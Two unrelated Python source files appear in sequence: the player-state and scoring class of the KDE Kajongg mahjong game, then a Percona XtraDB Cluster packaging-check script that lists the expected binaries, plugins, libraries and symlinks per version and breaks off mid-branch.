def __getitem__(self, index):
"""allow access by idx or by wind"""
if isinstance(index, basestring) and len(index) == 1:
for player in self:
if player.wind == index:
return player
logException("no player has wind %s" % index)
return list.__getitem__(self, index)
def __str__(self):
return ', '.join(list('%s: %s' % (x.name, x.wind) for x in self))
def byId(self, playerid):
"""lookup the player by id"""
for player in self:
if player.nameid == playerid:
return player
logException("no player has id %d" % playerid)
def byName(self, playerName):
"""lookup the player by name"""
for player in self:
if player.name == playerName:
return player
logException("no player has name %s - we have %s" % (playerName, [x.name for x in self]))
@staticmethod
def load():
"""load all defined players into self.allIds and self.allNames"""
query = Query("select id,name from player")
if not query.success:
sys.exit(1)
Players.allIds = {}
Players.allNames = {}
for nameid, name in query.records:
Players.allIds[name] = nameid
Players.allNames[nameid] = name
@staticmethod
def createIfUnknown(name):
"""create player in database if not there yet"""
if name not in Players.allNames.values():
Players.load() # maybe somebody else already added it
if name not in Players.allNames.values():
with Transaction():
Query("insert into player(name) values(?)",
list([name]))
Players.load()
assert name in Players.allNames.values()
@staticmethod
def localPlayers():
"""return a list of locally defined players like we need them
for a scoring game"""
return list(x[0] for x in Query('select name, id from player where'
' not name like "ROBOT %" and not name like "Robot %"'
' and not exists(select 1 from'
' server where server.lastname=player.name)').records)
def translatePlayerNames(self, names):
"""for a list of names, translates those names which are english
player names into the local language"""
known = set(x.name for x in self)
return list(self.byName(x).localName if x in known else x for x in names)
class Player(object):
"""all player related attributes without GUI stuff.
concealedTileNames: used during the hand for all concealed tiles, ungrouped.
concealedMelds: is empty during the hand, will be valid after end of hand,
containing the concealed melds as the player presents them."""
# pylint: disable=R0902
# pylint we need more than 10 instance attributes
# pylint: disable=R0904
# pylint we need more than 40 public methods
def __init__(self, game):
self.game = game
self.__balance = 0
self.__payment = 0
self.wonCount = 0
self.name = ''
self.wind = WINDS[0]
self.visibleTiles = IntDict(game.visibleTiles)
self.clearHand()
self.__lastSource = '1' # no source: blessing from heaven or earth
self.remote = None # only for server
self.voice = None
self.handBoard = None
def speak(self, text):
"""speak if we have a voice"""
pass
def clearHand(self):
"""clear player attributes concerning the current hand"""
self.__concealedTileNames = []
self.__exposedMelds = []
self.__concealedMelds = []
self.__bonusTiles = []
self.discarded = []
self.visibleTiles.clear()
self.newHandContent = None
self.originalCallingHand = None
self.lastTile = None
self.lastSource = '1'
self.lastMeld = Meld()
self.__mayWin = True
self.__payment = 0
self.originalCall = False
self.dangerousTiles = list()
self.claimedNoChoice = False
self.playedDangerous = False
self.usedDangerousFrom = None
self.isCalling = False
self.__hand = None
def invalidateHand(self):
"""some source for the computation of current hand changed"""
self.__hand = None
@apply
def hand(): # pylint: disable=E0202
"""a readonly tuple"""
def fget(self):
# pylint: disable=W0212
if not self.__hand:
self.__hand = self.computeHand()
return self.__hand
return property(**locals())
@apply
def bonusTiles(): # pylint: disable=E0202
"""a readonly tuple"""
def fget(self):
# pylint: disable=W0212
return tuple(self.__bonusTiles)
return property(**locals())
@apply
def concealedTileNames(): # pylint: disable=E0202
"""a readonly tuple"""
def fget(self):
# pylint: disable=W0212
return tuple(self.__concealedTileNames)
return property(**locals())
@apply
def exposedMelds(): # pylint: disable=E0202
"""a readonly tuple"""
def fget(self):
# pylint: disable=W0212
return tuple(self.__exposedMelds)
return property(**locals())
@apply
def concealedMelds(): # pylint: disable=E0202
"""a readonly tuple"""
def fget(self):
# pylint: disable=W0212
return tuple(self.__concealedMelds)
return property(**locals())
@apply
def mayWin(): # pylint: disable=E0202
"""a readonly tuple"""
def fget(self):
# pylint: disable=W0212
return self.__mayWin
def fset(self, value):
# pylint: disable=W0212
if self.__mayWin != value:
self.__mayWin = value
self.__hand = None
return property(**locals())
@apply
def lastSource(): # pylint: disable=E0202
"""the source of the last tile the player got"""
def fget(self):
# pylint: disable=W0212
return self.__lastSource
def fset(self, lastSource):
# pylint: disable=W0212
self.__lastSource = lastSource
if lastSource == 'd' and not self.game.wall.living:
self.__lastSource = 'Z'
if lastSource == 'w' and not self.game.wall.living:
self.__lastSource = 'z'
return property(**locals())
@apply
def nameid():
"""the name id of this player"""
def fget(self):
return Players.allIds[self.name]
return property(**locals())
@apply
def localName():
"""the localized name of this player"""
def fget(self):
return m18nc('kajongg, name of robot player, to be translated', self.name)
return property(**locals())
def hasManualScore(self): # pylint: disable=R0201
"""virtual: has a manual score been entered for this game?"""
# pylint does not recognize that this is overridden by
# an implementation that needs self
return False
@apply
def handTotal():
"""the hand total of this player"""
def fget(self):
if self.hasManualScore():
spValue = InternalParameters.field.scoringDialog.spValues[self.idx]
return spValue.value()
if not self.game.isScoringGame() and not self.game.winner:
return 0
return self.hand.total()
return property(**locals())
@apply
def balance():
"""the balance of this player"""
def fget(self):
# pylint: disable=W0212
return self.__balance
def fset(self, balance):
# pylint: disable=W0212
self.__balance = balance
self.__payment = 0
return property(**locals())
@apply
def values():
"""the values that are still needed after ending a hand"""
def fget(self):
return self.name, self.wind, self.balance, self.voice
def fset(self, values):
self.name = values[0]
self.wind = values[1]
self.balance = values[2]
self.voice = values[3]
return property(**locals())
def getsPayment(self, payment):
"""make a payment to this player"""
self.__balance += payment
self.__payment += payment
@apply
def payment():
"""the payments for the current hand"""
def fget(self):
# pylint: disable=W0212
return self.__payment
def fset(self, payment):
assert payment == 0
self.__payment = 0
return property(**locals())
def __repr__(self):
return u'{name:<10} {wind}'.format(name=self.name[:10], wind=self.wind)
def __unicode__(self):
return u'{name:<10} {wind}'.format(name=self.name[:10], wind=self.wind)
def pickedTile(self, deadEnd, tileName=None):
"""got a tile from wall"""
self.game.activePlayer = self
tile = self.game.wall.deal([tileName], deadEnd=deadEnd)[0]
self.lastTile = tile.element
self.addConcealedTiles(tile)
if deadEnd:
self.lastSource = 'e'
else:
self.game.lastDiscard = None
self.lastSource = 'w'
return tile
def addConcealedTiles(self, data):
"""add to my tiles and sync the hand board"""
assert isinstance(data, (Tile, list)), data
assert not self.game.isScoringGame()
if isinstance(data, Tile):
data = list([data])
for tile in data:
assert isinstance(tile, Tile)
tileName = tile.element
if tile.isBonus():
self.__bonusTiles.append(tile)
else:
assert tileName.istitle()
self.__concealedTileNames.append(tileName)
self.__hand = None
if data:
self.syncHandBoard(adding=data)
def addMeld(self, meld):
"""add meld to this hand in a scoring game
also used for the Game instance maintained by the server"""
if len(meld.tiles) == 1 and meld[0].isBonus():
self.__bonusTiles.append(meld[0])
elif meld.state == CONCEALED and not meld.isKong():
self.__concealedMelds.append(meld)
else:
self.__exposedMelds.append(meld)
self.__hand = None
def remove(self, tile=None, meld=None):
"""remove from my melds or tiles"""
tiles = [tile] if tile else meld.tiles
if len(tiles) == 1 and tiles[0].isBonus():
self.__bonusTiles.remove(tiles[0])
self.__hand = None
self.syncHandBoard()
return
if tile:
assert not meld, (str(tile), str(meld))
assert not self.game.isScoringGame()
tileName = tile.element
try:
self.__concealedTileNames.remove(tileName)
except ValueError:
raise Exception('removeTiles(%s): tile not in concealed %s' % \
(tileName, ''.join(self.__concealedTileNames)))
else:
self.removeMeld(meld)
self.__hand = None
self.syncHandBoard()
def removeMeld(self, meld):
"""remove a meld from this hand in a scoring game"""
assert self.game.isScoringGame()
for melds in [self.__concealedMelds, self.__exposedMelds]:
for idx, myTile in enumerate(melds):
if id(myTile) == id(meld):
melds.pop(idx)
self.__hand = None
def hasConcealedTiles(self, tileNames, within=None):
"""do I have those concealed tiles?"""
if within is None:
within = self.__concealedTileNames
within = within[:]
for tileName in tileNames:
if tileName not in within:
return False
within.remove(tileName)
return True
def showConcealedTiles(self, tileNames, show=True):
"""show or hide tileNames"""
if not self.game.playOpen and self != self.game.myself:
if not isinstance(tileNames, (list, tuple)):
tileNames = [tileNames]
assert len(tileNames) <= len(self.__concealedTileNames), \
'%s: showConcealedTiles %s, we have only %s' % (self, tileNames, self.__concealedTileNames)
for tileName in tileNames:
src, dst = ('Xy', tileName) if show else (tileName, 'Xy')
assert src != dst, (self, src, dst, tileNames, self.__concealedTileNames)
if not src in self.__concealedTileNames:
logException( '%s: showConcealedTiles(%s): %s not in %s.' % \
(self, tileNames, src, self.__concealedTileNames))
idx = self.__concealedTileNames.index(src)
self.__concealedTileNames[idx] = dst
self.__hand = None
self.syncHandBoard()
def showConcealedMelds(self, concealedMelds, ignoreDiscard=None):
"""the server tells how the winner shows and melds his
concealed tiles. In case of error, return message and arguments"""
for part in concealedMelds.split():
meld = Meld(part)
for pair in meld.pairs:
if pair == ignoreDiscard:
ignoreDiscard = None
else:
if not pair in self.__concealedTileNames:
msg = m18nE('%1 claiming MahJongg: She does not really have tile %2')
return msg, self.name, pair
self.__concealedTileNames.remove(pair)
self.addMeld(meld)
if self.__concealedTileNames:
msg = m18nE('%1 claiming MahJongg: She did not pass all concealed tiles to the server')
return msg, self.name
self.__hand = None
def hasExposedPungOf(self, tileName):
"""do I have an exposed Pung of tileName?"""
for meld in self.__exposedMelds:
if meld.pairs == [tileName.lower()] * 3:
return True
return False
def robTile(self, tileName):
"""used for robbing the kong"""
assert tileName.istitle()
tileName = tileName.lower()
for meld in self.__exposedMelds:
if tileName in meld.pairs:
meld.pairs.remove(tileName)
meld.meldtype = PUNG
self.visibleTiles[tileName] -= 1
break
else:
raise Exception('robTile: no meld found with %s' % tileName)
if InternalParameters.field:
hbTiles = self.handBoard.tiles
self.game.lastDiscard = [x for x in hbTiles if x.element == tileName][-1]
# remove from board of robbed player, otherwise syncHandBoard would
# not fix display for the robbed player
self.game.lastDiscard.setBoard(None)
self.syncHandBoard()
else:
self.game.lastDiscard = Tile(tileName)
self.game.lastDiscard.element = self.game.lastDiscard.upper()
def scoreMatchesServer(self, score):
"""do we compute the same score as the server does?"""
if score is None:
return True
if 'Xy' in self.__concealedTileNames:
return True
if str(self.hand) == score:
return True
self.game.debug('%s localScore:%s' % (self, self.hand))
self.game.debug('%s serverScore:%s' % (self, score))
logWarning('Game %s: client and server disagree about scoring, see logfile for details' % self.game.seed)
return False
def mustPlayDangerous(self, exposing=None):
"""returns True if the player has no choice, otherwise False.
Exposing may be a meld which will be exposed before we might
play dangerous"""
if self == self.game.activePlayer and exposing and len(exposing) == 4:
# declaring a kong is never dangerous because we get
# an unknown replacement
return False
afterExposed = list(x.lower() for x in self.__concealedTileNames)
if exposing:
exposing = exposing[:]
if self.game.lastDiscard:
# if this is about claiming a discarded tile, ignore it
# the player who discarded it is responsible
exposing.remove(self.game.lastDiscard.element)
for tileName in exposing:
if tileName.lower() in afterExposed:
# the "if" is needed for claimed pung
afterExposed.remove(tileName.lower())
return all(self.game.dangerousFor(self, x) for x in afterExposed)
def exposeMeld(self, meldTiles, calledTile=None):
"""exposes a meld with meldTiles: removes them from concealedTileNames,
adds the meld to exposedMelds and returns it
calledTile: we got the last tile for the meld from discarded, otherwise
from the wall"""
game = self.game
game.activePlayer = self
allMeldTiles = meldTiles[:]
if calledTile:
allMeldTiles.append(calledTile.element if isinstance(calledTile, Tile) else calledTile)
if len(allMeldTiles) == 4 and allMeldTiles[0].islower():
tile0 = allMeldTiles[0].lower()
# we are adding a 4th tile to an exposed pung
self.__exposedMelds = [meld for meld in self.__exposedMelds if meld.pairs != [tile0] * 3]
meld = Meld(tile0 * 4)
self.__concealedTileNames.remove(allMeldTiles[3])
self.visibleTiles[tile0] += 1
else:
allMeldTiles = sorted(allMeldTiles) # needed for Chow
meld = Meld(allMeldTiles)
for meldTile in meldTiles:
self.__concealedTileNames.remove(meldTile)
for meldTile in allMeldTiles:
self.visibleTiles[meldTile.lower()] += 1
meld.expose(bool(calledTile))
self.__exposedMelds.append(meld)
self.__hand = None
game.computeDangerous(self)
adding = [calledTile] if calledTile else None
self.syncHandBoard(adding=adding)
return meld
def findDangerousTiles(self):
"""update the list of dangerous tile"""
pName = self.localName
dangerous = list()
expMeldCount = len(self.__exposedMelds)
if expMeldCount >= 3:
if all(x in elements.greenHandTiles for x in self.visibleTiles):
dangerous.append((elements.greenHandTiles,
m18n('Player %1 has 3 or 4 exposed melds, all are green', pName)))
color = defaultdict.keys(self.visibleTiles)[0][0]
# see http://www.logilab.org/ticket/23986
assert color.islower(), self.visibleTiles
if color in 'sbc':
if all(x[0] == color for x in self.visibleTiles):
suitTiles = set([color+x for x in '123456789'])
if self.visibleTiles.count(suitTiles) >= 9:
dangerous.append((suitTiles, m18n('Player %1 may try a True Color Game', pName)))
elif all(x[1] in '19' for x in self.visibleTiles):
dangerous.append((elements.terminals,
m18n('Player %1 may try an All Terminals Game', pName)))
if expMeldCount >= 2:
windMelds = sum(self.visibleTiles[x] >=3 for x in elements.winds)
dragonMelds = sum(self.visibleTiles[x] >=3 for x in elements.dragons)
windsDangerous = dragonsDangerous = False
if windMelds + dragonMelds == expMeldCount and expMeldCount >= 3:
windsDangerous = dragonsDangerous = True
windsDangerous = windsDangerous or windMelds >= 3
dragonsDangerous = dragonsDangerous or dragonMelds >= 2
if windsDangerous:
dangerous.append((set(x for x in elements.winds if x not in self.visibleTiles),
m18n('Player %1 exposed many winds', pName)))
if dragonsDangerous:
dangerous.append((set(x for x in elements.dragons if x not in self.visibleTiles),
m18n('Player %1 exposed many dragons', pName)))
self.dangerousTiles = dangerous
if dangerous and Debug.dangerousGame:
self.game.debug('dangerous:%s' % dangerous)
def popupMsg(self, msg):
"""virtual: show popup on display"""
pass
def hidePopup(self):
"""virtual: hide popup on display"""
pass
def syncHandBoard(self, adding=None):
"""virtual: synchronize display"""
pass
def colorizeName(self):
"""virtual: colorize Name on wall"""
pass
def getsFocus(self, dummyResults=None):
"""virtual: player gets focus on his hand"""
pass
def mjString(self, asWinner=False):
"""compile hand info into a string as needed by the scoring engine"""
game = self.game
assert game
winds = self.wind.lower() + 'eswn'[game.roundsFinished % 4]
wonChar = 'm'
lastSource = ''
declaration = ''
if asWinner or self == game.winner:
wonChar = 'M'
lastSource = self.lastSource
if self.originalCall:
declaration = 'a'
if not self.mayWin:
wonChar = 'x'
return ''.join([wonChar, winds, lastSource, declaration])
def sortMeldsByX(self):
"""sorts the melds by their position on screen"""
if self.game.isScoringGame():
# in a real game, the player melds do not have tiles
self.__concealedMelds = sorted(self.__concealedMelds, key=lambda x: x[0].xoffset)
self.__exposedMelds = sorted(self.__exposedMelds, key=lambda x: x[0].xoffset)
def makeTileKnown(self, tileName):
"""used when somebody else discards a tile"""
assert self.__concealedTileNames[0] == 'Xy'
self.__concealedTileNames[0] = tileName
self.__hand = None
def computeHand(self, withTile=None, robbedTile=None, dummy=None, asWinner=False):
"""returns Hand for this player"""
assert not (self.__concealedMelds and self.__concealedTileNames)
assert not isinstance(self.lastTile, Tile)
assert not isinstance(withTile, Tile)
melds = ['R' + ''.join(self.__concealedTileNames)]
if withTile:
melds[0] += withTile
melds.extend(x.joined for x in self.__exposedMelds)
melds.extend(x.joined for x in self.__concealedMelds)
melds.extend(''.join(x.element) for x in self.__bonusTiles)
mjString = self.mjString(asWinner)
melds.append(mjString)
if mjString.startswith('M') and (withTile or self.lastTile):
melds.append('L%s%s' % (withTile or self.lastTile, self.lastMeld.joined))
if self.game.eastMJCount == 8 and self == self.game.winner and self.wind == 'E':
# eastMJCount will only be inced later, in saveHand
rules = [self.game.ruleset.findRule('XEAST9X')]
else:
rules = None
return Hand.cached(self, ' '.join(melds), computedRules=rules, robbedTile=robbedTile)
def computeNewHand(self):
"""returns the new hand. Same as current unless we need to discard. In that
case, make an educated guess about the discard. For player==game.myself, use
the focussed tile."""
hand = self.hand
if hand and hand.tileNames and self.__concealedTileNames:
if hand.lenOffset == 1 and not hand.won:
if self == self.game.myself:
removeTile = self.handBoard.focusTile.element
elif self.lastTile:
removeTile = self.lastTile
else:
removeTile = self.__concealedTileNames[0]
assert removeTile[0] not in 'fy', 'hand:%s remove:%s lastTile:%s' % (
hand, removeTile, self.lastTile)
hand -= removeTile
assert not hand.lenOffset
return hand
def possibleChows(self, tileName=None, within=None):
"""returns a unique list of lists with possible claimable chow combinations"""
exposedChows = [x for x in self.__exposedMelds if x.isChow()]
if len(exposedChows) >= self.game.ruleset.maxChows:
return []
if tileName is None:
tileName = self.game.lastDiscard.element
if within is None:
within = self.__concealedTileNames
within = within[:]
within.append(tileName)
return hasChows(tileName, within)
def exposedChows(self):
"""returns a list of exposed chows"""
return [x for x in self.__exposedMelds if x.isChow()]
def possibleKongs(self):
"""returns a unique list of lists with possible kong combinations"""
kongs = []
if self == self.game.activePlayer:
# declaring a kong
for tileName in set([x for x in self.__concealedTileNames if x[0] not in 'fy']):
if self.__concealedTileNames.count(tileName) == 4:
kongs.append([tileName] * 4)
elif self.__concealedTileNames.count(tileName) == 1 and \
tileName.lower() * 3 in list(x.joined for x in self.__exposedMelds):
kongs.append([tileName.lower()] * 3 + [tileName])
if self.game.lastDiscard:
# claiming a kong
discardName = self.game.lastDiscard.element.capitalize()
if self.__concealedTileNames.count(discardName) == 3:
kongs.append([discardName] * 4)
return kongs
def declaredMahJongg(self, concealed, withDiscard, lastTile, lastMeld):
"""player declared mah jongg. Determine last meld, show concealed tiles grouped to melds"""
assert not isinstance(lastTile, Tile)
lastMeld = Meld(lastMeld) # do not change the original!
self.game.winner = self
if withDiscard:
self.lastTile = withDiscard
self.lastMeld = lastMeld
assert withDiscard == self.game.lastDiscard.element, 'withDiscard: %s lastDiscard: %s' % (
withDiscard, self.game.lastDiscard.element)
self.addConcealedTiles(self.game.lastDiscard)
melds = [Meld(x) for x in concealed.split()]
if self.lastSource != 'k': # robbed the kong
self.lastSource = 'd'
# the last claimed meld is exposed
assert lastMeld in melds, '%s: concealed=%s melds=%s lastMeld=%s lastTile=%s withDiscard=%s' % (
self.__concealedTileNames, concealed,
meldsContent(melds), ''.join(lastMeld.pairs), lastTile, withDiscard)
melds.remove(lastMeld)
self.lastTile = self.lastTile.lower()
lastMeld.pairs.toLower()
self.__exposedMelds.append(lastMeld)
for tileName in lastMeld.pairs:
self.visibleTiles[tileName] += 1
else:
melds = [Meld(x) for x in concealed.split()]
self.lastTile = lastTile
self.lastMeld = lastMeld
self.__concealedMelds = melds
self.__concealedTileNames = []
self.__hand = None
self.syncHandBoard()
def scoringString(self):
"""helper for HandBoard.__str__"""
if self.__concealedMelds:
parts = [x.joined for x in self.__concealedMelds + self.__exposedMelds]
else:
parts = [''.join(self.__concealedTileNames)]
parts.extend([x.joined for x in self.__exposedMelds])
parts.extend(''.join(x.element) for x in self.__bonusTiles)
return ' '.join(parts)
def others(self):
"""a list of the other 3 players"""
return (x for x in self.game.players if x != self)
def tileAvailable(self, tileName, hand):
"""a count of how often tileName might still appear in the game
supposing we have hand"""
visible = self.game.discardedTiles.count([tileName.lower()])
for player in self.others():
visible += player.visibleTiles.count([tileName.capitalize()])
visible += player.visibleTiles.count([tileName.lower()])
for pair in hand.tileNames:
if pair.lower() == tileName.lower():
visible += 1
return 4 - visible
def violatesOriginalCall(self, tileName=None):
"""called if discarding tileName (default=just discarded tile)
violates the Original Call"""
if not self.originalCall or not self.mayWin:
return False
if tileName is None:
if len(self.discarded) < 2:
return False
tileName = self.discarded[-1]
if self.lastTile.lower() != tileName.lower():
if Debug.originalCall:
self.game.debug('%s would violate OC with %s, lastTile=%s' % (self, tileName, self.lastTile))
return True
return False
|
jsj2008/kdegames
|
kajongg/src/player.py
|
Python
|
gpl-2.0
| 30,828
|
#!/usr/bin/env python3
import os
base_dir = os.getenv('BASE_DIR')
pxc_version = os.getenv('PXC_VERSION')
pxc_revision = os.getenv('PXC_REVISION')
pxc57_pkg_version = os.getenv('PXC57_PKG_VERSION')
wsrep_version = os.getenv('WSREP_VERSION')
glibc_version = os.getenv('GLIBC_VERSION')
pxc_version_percona = pxc_version.split('-')[0]
pxc_version_major = pxc_version_percona.split('.')[0] + '.' + pxc_version_percona.split('.')[1]
if pxc_version_major == "5.7":
print(pxc_version)
print(pxc57_pkg_version)
pxc57_client_version = pxc57_pkg_version.split('-')[0] + '-' + pxc57_pkg_version.split('-')[1][3:]
pxc57_server_version_norel = pxc57_pkg_version.split('-')[0] + '-' + pxc57_pkg_version.split('-')[1][3:] + '-' + pxc57_pkg_version.split('-')[2].split('.')[0]
pxc57_server_version = pxc57_pkg_version.split('-')[0] + '-' + pxc57_pkg_version.split('-')[1] + '-' + pxc57_pkg_version.split('-')[2].split('.')[0]
pxc57_client_version_using = "6.0" if glibc_version == "2.12" else "6.2"
# 8.0
pxc80_binaries = [
'bin/garbd',
'bin/pxc_extra/pxb-2.4/bin/xtrabackup', 'bin/pxc_extra/pxb-2.4/bin/xbcloud',
'bin/pxc_extra/pxb-2.4/bin/xbcrypt', 'bin/pxc_extra/pxb-2.4/bin/xbstream',
'bin/pxc_extra/pxb-8.0/bin/xtrabackup', 'bin/pxc_extra/pxb-8.0/bin/xbcloud',
'bin/pxc_extra/pxb-8.0/bin/xbcrypt', 'bin/pxc_extra/pxb-8.0/bin/xbstream',
'bin/mysql', 'bin/mysqld', 'bin/mysqladmin', 'bin/mysqlbinlog',
'bin/mysqldump', 'bin/mysqlimport', 'bin/mysqlpump', 'bin/mysqlshow',
'bin/mysqlslap', 'bin/mysqlcheck', 'bin/mysql_config_editor',
'bin/mysqlrouter', 'bin/mysqlrouter_passwd', 'bin/mysqlrouter_plugin_info', 'bin/mysql_secure_installation', 'bin/mysql_ssl_rsa_setup',
'bin/mysql_upgrade', 'bin/mysql_tzinfo_to_sql'
]
pxc80_executables = pxc80_binaries + [
'bin/clustercheck', 'bin/wsrep_sst_common', 'bin/wsrep_sst_xtrabackup-v2',
'bin/pxc_extra/pxb-2.4/bin/xbcloud_osenv',
'bin/pxc_extra/pxb-8.0/bin/xbcloud_osenv',
'bin/ps-admin',
'bin/mysqldumpslow',
'bin/mysql_config',
]
pxc80_plugins = (
('audit_log','audit_log.so'),('mysql_no_login','mysql_no_login.so'),('validate_password','validate_password.so'),
('version_tokens','version_token.so'),('rpl_semi_sync_master','semisync_master.so'),('rpl_semi_sync_slave','semisync_slave.so'),
('clone','mysql_clone.so'),('data_masking','data_masking.so')
)
pxc80_functions = (
('fnv1a_64', 'libfnv1a_udf.so', 'INTEGER'),('fnv_64', 'libfnv_udf.so', 'INTEGER'),('murmur_hash', 'libmurmur_udf.so', 'INTEGER'),
('version_tokens_set', 'version_token.so', 'STRING'),('version_tokens_show', 'version_token.so', 'STRING'),('version_tokens_edit', 'version_token.so', 'STRING'),
('version_tokens_delete', 'version_token.so', 'STRING'),('version_tokens_lock_shared', 'version_token.so', 'INT'),('version_tokens_lock_exclusive', 'version_token.so', 'INT'),
('version_tokens_unlock', 'version_token.so', 'INT'),('service_get_read_locks', 'locking_service.so', 'INT'),('service_get_write_locks', 'locking_service.so', 'INT'),
('service_release_locks', 'locking_service.so', 'INT')
)
pxc80_files = (
'lib/libgalera_smm.so', 'lib/libperconaserverclient.a', 'lib/libperconaserverclient.so.21.1.26' ,
'lib/libmysqlservices.a' , 'lib/plugin/audit_log.so',
'lib/plugin/auth_pam.so', 'lib/plugin/auth_pam_compat.so', 'lib/plugin/data_masking.so',
'lib/plugin/data_masking.ini', 'lib/plugin/keyring_file.so',
'lib/plugin/keyring_udf.so', 'lib/plugin/keyring_vault.so'
)
pxc80_symlinks = (
('lib/libcrypto.so','lib/private/libcrypto.so.1.0.2k'), ('lib/libfreebl3.so','lib/private/libfreebl3.so'),
('lib/libgcrypt.so','lib/private/libgcrypt.so.11.8.2'), ('lib/libnspr4.so','lib/private/libnspr4.so'),
('lib/libnss3.so','lib/private/libnss3.so'), ('lib/libnssutil3.so','lib/private/libnssutil3.so'),
('lib/libperconaserverclient.so','lib/libperconaserverclient.so.21.1.26'), ('lib/libplc4.so','lib/private/libplc4.so'),
('lib/libplds4.so','lib/private/libplds4.so'), ('lib/libsasl2.so','lib/private/libsasl2.so.3.0.0'),
('lib/libsmime3.so','lib/private/libsmime3.so'), ('lib/libssl.so','lib/private/libssl.so.1.0.2k'),
('lib/libssl3.so','lib/private/libssl3.so'), ('lib/libtinfo.so','lib/private/libtinfo.so.5.9'),
)
# 5.7
pxc57_binaries = [
'bin/garbd', 'bin/innochecksum', 'bin/lz4_decompress', 'bin/my_print_defaults',
'bin/myisam_ftdump','bin/myisamchk', 'bin/myisamlog', 'bin/myisampack', 'bin/mysql', 'bin/mysql_client_test',
'bin/mysql_config_editor', 'bin/mysql_install_db', 'bin/mysql_plugin', 'bin/mysql_secure_installation',
'bin/mysql_ssl_rsa_setup', 'bin/mysql_tzinfo_to_sql', 'bin/mysql_upgrade', 'bin/mysqladmin', 'bin/mysqlbinlog',
'bin/mysqlcheck', 'bin/mysqld', 'bin/mysqldump',
'bin/mysqlimport', 'bin/mysqlpump', 'bin/mysqlshow', 'bin/mysqlslap', 'bin/mysqltest', 'bin/mysqlxtest', 'bin/perror',
'bin/replace', 'bin/resolve_stack_dump',
'bin/resolveip',
'bin/zlib_decompress'
]
pxc57_executables = pxc57_binaries + [
'bin/clustercheck',
'bin/mysql_config',
'bin/mysqld_multi', 'bin/mysqld_safe', 'bin/mysqldumpslow',
'bin/ps-admin', 'bin/ps_mysqld_helper', 'bin/ps_tokudb_admin', 'bin/pyclustercheck',
'bin/wsrep_sst_common', 'bin/wsrep_sst_mysqldump', 'bin/wsrep_sst_rsync', 'bin/wsrep_sst_xtrabackup-v2',
]
pxc57_plugins = (
('audit_log','audit_log.so'),('mysql_no_login','mysql_no_login.so'),('validate_password','validate_password.so'),
('version_tokens','version_token.so'),('rpl_semi_sync_master','semisync_master.so'),
('rpl_semi_sync_slave','semisync_slave.so')
)
pxc57_functions = (
('fnv1a_64', 'libfnv1a_udf.so', 'INTEGER'),('fnv_64', 'libfnv_udf.so', 'INTEGER'),('murmur_hash', 'libmurmur_udf.so', 'INTEGER'),
('version_tokens_set', 'version_token.so', 'STRING'),('version_tokens_show', 'version_token.so', 'STRING'),('version_tokens_edit', 'version_token.so', 'STRING'),
('version_tokens_delete', 'version_token.so', 'STRING'),('version_tokens_lock_shared', 'version_token.so', 'INT'),('version_tokens_lock_exclusive', 'version_token.so', 'INT'),
('version_tokens_unlock', 'version_token.so', 'INT'),('service_get_read_locks', 'locking_service.so', 'INT'),('service_get_write_locks', 'locking_service.so', 'INT'),
('service_release_locks', 'locking_service.so', 'INT')
)
pxc57_files = (
'lib/libgalera_smm.so', 'lib/libperconaserverclient.a', 'lib/libperconaserverclient.so.20.3.23' ,
'lib/libmysqlservices.a' , 'lib/libcoredumper.a', 'lib/mysql/plugin/audit_log.so',
'lib/mysql/plugin/auth_pam.so', 'lib/mysql/plugin/auth_pam_compat.so',
'lib/mysql/plugin/keyring_file.so', 'lib/mysql/plugin/keyring_udf.so', 'lib/mysql/plugin/keyring_vault.so'
)
if glibc_version == "2.12":
pxc57_symlinks = (
('lib/libperconaserverclient.so','lib/libperconaserverclient.so.20.3.23'),
('lib/libperconaserverclient.so.20','lib/libperconaserverclient.so.20.3.23'),
('lib/libcrypto.so','lib/private/libcrypto.so.1.0.1e'),
('lib/libssl.so','lib/private/libssl.so.1.0.1e'),
('lib/libtinfo.so','lib/private/libtinfo.so.5.7'),
('lib/libsasl2.so','lib/private/libsasl2.so.2.0.23'),
('lib/libreadline.so','lib/private/libreadline.so.6.0'),
)
else:
pxc57_symlinks = (
('lib/libperconaserverclient.so','lib/libperconaserverclient.so.20.3.23'),
('lib/libperconaserverclient.so.20','lib/libperconaserverclient.so.20.3.23'),
('lib/libncurses.so','lib/private/libncurses.so.5.9'),
('lib/libcrypto.so','lib/private/libcrypto.so.1.0.2k'),
('lib/libssl.so','lib/private/libssl.so.1.0.2k'),
('lib/libtinfo.so','lib/private/libtinfo.so.5.9'),
('lib/libsasl2.so','lib/private/libsasl2.so.3.0.0'),
('lib/libreadline.so','lib/private/libreadline.so.6.2'),
)
# 5.6
pxc56_binaries = [
'bin/mysql', 'bin/mysqld', 'bin/mysqladmin', 'bin/mysqlbinlog', 'bin/mysqldump',
'bin/mysqlimport', 'bin/mysqlshow', 'bin/mysqlslap', 'bin/mysqlcheck',
'bin/mysql_config_editor', 'bin/mysql_secure_installation', 'bin/mysql_upgrade', 'bin/mysql_tzinfo_to_sql'
]
pxc56_executables = pxc56_binaries + [
'bin/mysqldumpslow'
]
pxc56_plugins = (
('audit_log','audit_log.so'),('mysql_no_login','mysql_no_login.so'),('validate_password','validate_password.so'),
('rpl_semi_sync_master','semisync_master.so'),('rpl_semi_sync_slave','semisync_slave.so')
)
pxc56_functions = (
('fnv1a_64', 'libfnv1a_udf.so', 'INTEGER'),('fnv_64', 'libfnv_udf.so', 'INTEGER'),('murmur_hash', 'libmurmur_udf.so', 'INTEGER')
)
pxc56_files = (
'lib/libHotBackup.so', 'lib/libmysqlservices.a',
'lib/libperconaserverclient.a', 'lib/libperconaserverclient.so.18.1.0' ,'lib/mysql/libjemalloc.so.1',
'lib/mysql/plugin/ha_tokudb.so', 'lib/mysql/plugin/audit_log.so',
'lib/mysql/plugin/auth_pam.so', 'lib/mysql/plugin/auth_pam_compat.so', 'lib/mysql/plugin/tokudb_backup.so'
)
pxc56_symlinks = (
('lib/libperconaserverclient.so.18','lib/libperconaserverclient.so.18.1.0'),('lib/libperconaserverclient.so','lib/libperconaserverclient.so.18.1.0'),
('lib/libperconaserverclient_r.a','lib/libperconaserverclient.a'),('lib/libperconaserverclient_r.so','lib/libperconaserverclient.so.18.1.0'),
('lib/libperconaserverclient_r.so.18','lib/libperconaserverclient.so.18.1.0'),('lib/libperconaserverclient_r.so.18.1.0','lib/libperconaserverclient.so.18.1.0')
)
#####
if pxc_version_major == '8.0':
pxc_binaries = pxc80_binaries
pxc_executables = pxc80_executables
pxc_plugins = pxc80_plugins
pxc_functions = pxc80_functions
pxc_files = pxc80_files
pxc_symlinks = pxc80_symlinks
elif pxc_version_major == '5.7':
pxc_binaries = pxc57_binaries
